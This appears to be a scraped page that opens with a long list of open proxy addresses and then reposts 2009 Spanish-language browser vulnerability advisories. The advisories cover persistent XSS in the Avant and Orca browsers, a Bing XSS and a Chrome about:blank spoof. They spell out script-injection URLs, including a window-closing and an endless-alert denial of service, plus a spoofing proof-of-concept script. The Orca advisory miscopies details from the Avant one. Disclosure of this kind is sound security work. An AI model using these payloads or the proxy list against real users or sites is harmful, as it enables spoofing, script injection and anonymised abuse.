59.68.84.134:808
201.225.226.68:8080
221.94.35.46:8080
174.142.24.201:3128
80.167.238.78:8118
85.249.168.94:3128
151.201.108.214:444
212.165.156.42:3128
201.25.223.115:8000
82.40.228.204:9090
218.108.44.170:808
218.25.99.135:808
128.135.11.149:3128
128.232.103.201:3128
128.2.223.65:3128
134.226.52.34:3124
193.174.67.187:3127
203.180.81.158:8080
89.212.135.232:9090
194.42.17.123:3128
221.204.249.224:8080
173.32.83.25:9090
123.13.45.133:9000
123.4.130.14:9000
123.6.216.61:9000
125.45.98.86:9000
60.223.105.6:9000
58.44.25.170:9000
60.23.190.58:9000
60.208.191.33:9000
84.236.27.126:9000
58.214.36.77:8080
85.249.33.2:3128
124.133.87.6:9000
59.48.248.243:9000
202.44.4.85:8081
59.55.78.26:9000
222.243.208.10:8080
193.174.67.187:3124
203.186.108.130:65208
80.109.85.41:9090
24.189.131.189:9090
118.98.160.138:3128
91.200.235.231:3128
213.50.114.154:8080
148.244.244.182:8082
220.8.220.175:8080
61.213.197.107:444
24.11.22.240:9090
151.100.59.11:3127
84.120.177.10:11011
60.214.238.157:9000
93.157.202.69:3128
94.41.165.34:8080
58.245.231.24:9000
78.178.152.87:8088
60.223.192.106:9000
60.211.101.247:9000
60.217.214.137:9000
59.99.9.10:6588
58.242.70.16:9000
58.18.2.212:9000
58.18.238.64:9000
58.17.123.210:9000
58.17.196.93:9000
222.79.83.27:8080
123.4.133.40:9000
122.140.45.167:9000
123.5.41.186:9000
123.12.216.46:9000
219.32.120.66:8080
221.206.105.60:8080
123.188.202.115:9000
218.134.141.26:8080
124.132.14.114:9000
124.226.7.215:8080
123.13.0.133:9000
202.138.93.231:8080
71.205.69.232:9090
119.148.106.35:8080
193.174.67.187:3124
61.197.176.234:444
72.183.10.174:9090
122.160.41.99:8000
130.75.87.84:3124
59.7.91.227:8080
220.28.176.137:8080
82.43.58.68:9090
202.44.4.85:8081
58.25.227.85:8089
203.186.108.130:65208
129.10.120.193:3128
203.234.238.195:444
128.232.103.203:3124
61.153.48.72:808
82.228.101.113:14841
190.102.206.48:8080
220.28.46.131:8080
174.142.24.201:3128
67.48.22.73:9090
219.50.118.63:8080
200.157.100.33:8080
12.110.129.189:7212
219.94.84.102:8080
128.192.101.217:3128
132.187.230.1:3124
219.169.176.135:8080
134.226.52.35:3124
221.204.249.224:8080
89.250.7.160:3128
169.229.50.7:3127
193.55.112.41:3128
61.213.197.107:444
210.94.166.158:11055
219.179.68.106:8080
200.171.104.107:6588
69.64.68.182:3128
69.64.89.84:3128
69.64.70.242:3128
83.242.184.210:3128
217.25.23.118:3128
218.216.201.45:8080
98.208.76.247:9090
218.108.44.170:808
202.3.217.125:8080
68.5.44.131:9090
221.18.112.14:8080
218.25.99.135:808
140.109.17.180:3128
85.96.190.252:8088
211.140.182.236:808
201.218.246.244:3128
128.238.88.64:3128
planetlab-1.cs.ucy.ac.cy:3128
204.56.0.137:3127
80.101.55.148:8118
218.61.125.30:808
202.103.207.224:808
76.120.225.210:9090
141.76.45.18:3128
213.50.114.154:8080
58.214.36.77:8080
216.193.219.122:8118
222.127.228.70:8080
201.225.226.68:8080
98.227.14.54:9090
76.187.141.58:9090
75.66.26.190:9090
213.137.131.251:8080
85.214.113.101:1113
24.11.22.240:9090
68.103.16.107:9090
88.201.172.105:3128
85.249.33.2:3128
68.198.252.19:9090
220.40.60.59:8080
218.75.23.110:3128
218.108.223.194:808
61.17.161.104:6588
98.181.57.227:9090
70.69.189.13:9090
96.23.174.43:9090
200.161.196.59:6588
82.33.46.103:9090
78.187.166.179:8088
93.81.248.9:3128
173.32.83.25:9090
68.112.111.190:8080
67.164.198.58:9090
60.63.204.158:9000
129.69.210.96:3127
24.213.86.148:9090
219.26.189.21:8080
212.135.170.85:8080
202.82.118.193:65208
121.145.200.204:808
83.65.203.130:8080

Internet explorer pwned Avant Browser

03 agosto 2009 Publicado por cLimbo 0 comentarios
###########################################
Internet explorer pwned Avant Browser via history Persistent XSS vulnerabilities
URL del vendedor: http://www.avantbrowser.com/
Reportado: http://lostmon.blogspot.com/2009/08/internet-explorer-pwned-avant-browser.html
Aviso al vendedor: No Exploit disponible:
############################################

#############
descripcion
#############

Avant browser's es fácil de usar, aporta un nuevo nivel de claridad y eficiencia a su experiencia de navegación, y también tiene frecuentes actualizaciones que han mejorado constantemente su fiabilidad.

Avant Browser es freeware, 100% Gratis!.

Una vulnerabilidad es recientemente descubierta en el navegador Avant por mí y se puede explotar a través del historial en IE8

vuln relacionada => http://rootdev.blogspot.com/2009/08/avant-browser-browserhome.html

###############
version probada
###############

Internet Explorer 8 (en xp home)

Avant Browser 11.7 build 35

#########
solucion
##########

No hay solución en este momento.

#############
Cronología:
#############

Descubierto: 23-07-2009
Publicado: 03-08-2009

##################
pruebas
##################

http://rootdev.blogspot.com/2009/08/avant-browser-browserhome.html

Podéis ver esta vulnerabilidad de los navegadores. Es avanzada ya que puedes explotarla a través del explorador, se sabe que la columna afectada por el historial es una secuencia de comandos de inserción en el browse:home de dinámico contenido.

Si un usuario abre el explorador y trata de ir a un sitio malicioso como por ej:

http://usuarios.lycos.es/reyfuss/id.php?id="><h1>Test html injection</h1>

Por ejemplo, si esta url de búsqueda avanzada con el navegador => http://usuarios.lycos.es/reyfuss/id.php?id="><iframe src='http://www.google.com'></iframe>

El iframe no se ejecuta correctamente en el historial, pero, cerre avant y busqué la url con IE8 y se abría avant browser.. el iframe ahora se ejecuta correctamente :-D

Se guardan las URL en el explorador del historial, aquí está la vulnerabilidad, ya que el uso del navegador Avant usa el historial de IE8 para mostrar su propio historial en el browse:home, está abierto Avant Browser y el html se ejecuta en el historial de la columna y en la mayoría de los sitios visitados.

No sé si con el anty-XSS filtro en IE8 se podría proteger de una secuencia de comandos de ataque, pero en este momento podemos pensar que esta cuestión puede tener una condición de inyección en html y un atacante puede insertar un iframe.. y este es otro vector de ataque a Avant Browser.

################ End #####################

thnx to estrella to be my ligth
thnx to Brink he is investigate with me.
thnx to all who day after day support me !!!
atentamente:
--
Lostmon (lostmon@gmail.com)

----------

thz Lost :-)

Orca Browser browser:home Persistent XSS vulnerability

Publicado por cLimbo 0 comentarios
###########################################
Orca Browser browser:home Persistent XSS vulnerability
URL del vendedor: http://www.orcabrowser.com/
Reportado: http://lostmon.blogspot.com/2009/07/orca-browser-browserhome-persistent-xss.html
Aviso al vendedor: No Exploit disponible:
############################################

#############
Descripción
#############

Orca es un navegador del usuario-interfaz que aporta un nuevo nivel de claridad y eficiencia a su experiencia de navegación, y son frecuentes sus actualizaciones, ya que han mejorado constantemente su fiabilidad.

Avant Browser es freeware, 100% Gratis!.

Orca contiene un fallo que permite ataques cross site scripting (XSS). El defecto existe porque la aplicación no valida correctamente la url que se agrega a favoritos en el navegador: página de inicio.

Esto podría permitir a un usuario crear una URL especialmente preparada por el que ejecutar un código arbitrario en el navegador de un usuario dentro de la relación de confianza entre el navegador y el servidor, cuando intenta cargar browse:home, llevando a cabo una pérdida de integridad.

###############
versión de prueba
###############

Avant Browser 1.2 build 2

#########
solución:
##########

No hay solución en este momento.

#############
Cronología:
#############

Descubierto: 23-julio-2009
Publicado: 30 julio 2009

##################
pruebas
##################

Vídeo de demostración => http://www.spymac.com/details/?2417793

Abre Orca Browser y el navegador por defecto carga la página "brower:home", en esta página podemos ver las columnas, 1 top sitios 2 historial y 3 favoritos recientes.

La columna Marcadores es vulnerable a un XSS, vamos a demostrarlo:

Hacemos una página web vulnerable a una posible condición XSS

<?
$cmd=$_GET[id]
?>

Hago una demostración en línea de aquí doc => http://usuarios.lycos.es/reyfuss/id.php?id=

Orca abre el navegador y va a

http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>

haga clic en el marcador y haga clic en barra de herramientas en agregar favorito y añade esta dirección.

carga el browse:home o cierra y abre el navegador, el script se ejecuta en la columna de favoritos.

################ End #####################

thnx to estrella to be my ligth
thnx to Brink he is investigate with me.
thnx to all who day after day support me !!!
atentamente:
--
Lostmon (lostmon@gmail.com)

---------

thz Lost :-)

Avant Browser browser:home Vulnerabilidades XSS Persistentes

Publicado por Cross 0 comentarios
###########################################
Avant Browser browser:home Vulnerabilidades XSS Persistentes
url del desarrollador: http://www.avantbrowser.com/
Informador: http://lostmon.blogspot.com/2009/07/
avant-browser-browserhome-persistent.html
Notificado al desarrollador: NO Exploit disponible: YES
############################################

#############
Descripción
#############

La interfaz del navegador Avant eleva a un nuevo nivel de claridad y eficiencia a tu experiencia y las frequentes actualizaciones aumentan su fiabilidad.
El navegador Avant es Gratuito, 100% Grauito!

Avant Browser contiene un fallo de seguridad que permite técnicas de 'Remote Cross Site Scripting'. Este fallo existe gracias a que la aplicación no valida correctamente los enlaces a la hora de registrarlos en el historial, añadir una web a marcadores, y los sitios más visitados en en la página browser:home.
Esto permitiría a un usuario crear un enlace modificado ó un marcador que ejecute código arbitrario en el navegador del usuario mediante la relación validada entre cliente y servidor cuando éste intenta cargar browser:home, desembocando en una pérdida de integridad.

###############
Versiones Comprobadas
###############

Avant Browser 11.7 build 35

#########
Solución
##########

No hay solución disponible en éste momento.


Revisa el registro de cambios de ésta versión:

http://blog.avantforce.com/avant-browser-117-build-35-released/

#############
Línea de Tiempo
#############

Descubierto: 23-jul-2009
Publicado: 30 jul 2009

##################
Probando
##################

Vídeo demostración => http://www.spymac.com/details/?2417793
Al abrir el Navegador Avant y por defecto carga 'browser:home', podemos ver que hay tres columnas, 1 Top Sitios, 2 Historial y 3 Marcadores recientes.
Las tres columnas son vulnerables a XSS, para demostrar los tres casos, hacemos una web de pruebas para testearlo.

<?
$cmd=$_GET[id]
?>

Pongo la web pública para testear =>

http://usuarios.lycos.es/reyfuss/id.php?id=

Abrimos el navegador Avant y navegamos a
http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>
esperamos a que finalice la carga y cerramos el navegador ó abrimos browser:home.

El script es ejecutado y tenemos dos columnas afectadas, la primera y la segunda.

Vamos a Herramientas -> Borrar Historial

Vamos de nuevo a
http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>
click derecho y Añadir a marcadores.

Cargamos de nuevo browser:home y tenemos el XSS ejecutado en la columna marcadores.
Por ejemplo si queremos denegar el acceso a browser:home podemos cargar lo siguiente =>
http://usuarios.lycos.es/reyfuss/id.php?id="><script>window.close()</script>

Y cuando cargamos el navegador y carga browser:home, el script lo cierra.

Si quisieramos denegar el servicio cargamos =>
http://usuarios.lycos.es/reyfuss/id.php?id="><script>while(1)alert(1)</script>

################ Final #####################
Agradecimientos:

thnx to estrella to be my ligth
thnx to Brink he is investigate with me.
thnx to all who day after day support me !!!
thnx to RootDev
atentamente:

--
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

Bing.com Search engine, cache.aspx XSS

Publicado por cLimbo 0 comentarios
###########################################
Bing.com Search engine, cache.aspx XSS
URL del vendedor: http://ww.bing.com
Reportado: http://lostmon.blogspot.com/2009/07/bingcom-search-engine-cacheaspx-xss.html
Vendedor avisado: Vendedor confirmado:
###########################################

Bing es un motor de búsqueda que contiene un error el cual permite ataques cross site scripting. Este defecto existe porque la solicitud no valida correctamente la variable 'q' al script "cache.aspx". Se podría permitir a un usuario crear una URL especialmente preparada para ejecutar un código arbitrario en el navegador de un usuario, dentro de la relación de confianza entre el navegador y el servidor, lo que lleva a una pérdida de integridad.






#########
Solución:
##########

No existe solución en este momento.

Pero Microsoft planifica la revisión de la nueva versión del código de Bing.

#############
Cronología:
#############

Descubierto: 08-junio-2009
Notificado al vendedor: 11 junio 2009
Respuesta de los proveedores: 11 junio 2009
Última respuesta del vendedor: 30 junio 2009
Publicado: 29 julio 2009

################ End #####################

thnx to estrella to be my ligth
thnx to Brink he is investigate with me.
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)

------------

thz Lost :-)

Google Chrome About:blank spoof

02 agosto 2009 Publicado por cLimbo 0 comentarios
#######################################
Google Chrome About:blank spoof
URL del vendedor: www.google.com
Reportado: http://lostmon.blogspot.com/2009/07/google-chrome-aboutblank-spoof.html

Vendedor avisado: Exploit disponible:
########################################

vuln :=>http://code.google.com/p/chromium/issues/detail?id=17876

Chrome Version :2.0.172.37 (Build oficial)
URLs (if applicable) :
Other browsers tested:
Se añade OK o FAIL después de probar la vuln:
Safari 4: FAIL
Firefox 3.x: FAIL
IE 7: OK
IE 8: OK

¿Cómo se ejecuta la vulnerabilidad?

1.Se abre la página del exploit
2.Click en el vínculo
3.Mirar about:blank

¿Cuál es el resultado esperado?
Que muestre una página de error o de búsqueda en google

¿Qué sucede en cambio?

Escribe en about:blank

Prueba la información adicional y por favor; adjunta una captura

########################
Código de ejemplo
########################

</script>

<center>
<h1>Chrome about:blank Spoof</h1>
</center>

This vulnerability is based on http://www.securityfocus.com/bid/35829/ and
http://www.securityfocus.com/bid/35803
by Juan Pablo Lopez Yacubian and Michael Wood.

<p>
<a href='javascript:spoof()'><<h2>test Spoof !!</h2></a>
<p>


<script>
function spoof()
{

a = window.open('http://www.example.com%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20,')
a.document.write('<H1>FAKE PAGE<\h1>')
a.document.write('<title>test</title>')
a.stop ();
}
</script>
####################€nd#####################
thank to all Lostmon groups team
Thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)

-----------

thz Lost :-)